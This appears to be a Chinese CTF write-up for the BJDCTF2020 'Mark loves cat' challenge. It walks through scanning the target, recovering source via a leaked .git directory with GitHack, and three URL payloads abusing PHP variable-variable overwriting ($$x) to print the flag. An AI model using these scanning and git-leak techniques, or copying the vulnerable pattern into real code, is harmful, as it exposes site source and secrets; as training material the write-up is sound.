[BJDCTF2020]Mark loves cat

页面进来看起来是个人博客

dirsearch扫一下,发现有并发限制,需要把速度调慢

python dirsearch.py -u http://94195e76-dffb-441d-9b43-685bef98b5e9.node4.buuoj.cn:81/# --timeout=2 -t 1

git泄露,访问/.git/index

得到一个文件,直接打开的话是乱码

使用工具GitHack(git文件泄露工具)

python GitHack.py http://94195e76-dffb-441d-9b43-685bef98b5e9.node4.buuoj.cn:81/.git/

得到flag.php和index.php

在index.php中,发现

<?php

include 'flag.php';

$yds = "dog";
$is = "cat";
$handsome = 'yds';

foreach($_POST as $x => $y){
    $$x = $y;
}

foreach($_GET as $x => $y){
    $$x = $$y;
}

foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){
        exit($handsome);
    }
}

if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($yds);
}

if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){
    exit($is);
}



echo "the flag is: ".$flag;

解法一:

利用exit($handsome);

if($_GET['flag'] === $x && $x !== 'flag'){ //不能同时 flag的值等于某个键名,那个键名又是flag, 就是 flag=a && a!=flag

前面有GET和POST的变量覆盖,所以payload:

?handsome=flag&flag=handsome

解法二:

利用exit($yds);

GET和POST都没有设置flag

再利用变量覆盖,所以payload:

?yds=flag

解法三:

利用exit($is);

GET和POST的flag=flag,再利用变量覆盖

payload:

?is=flag&flag=flag

flag=flag
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值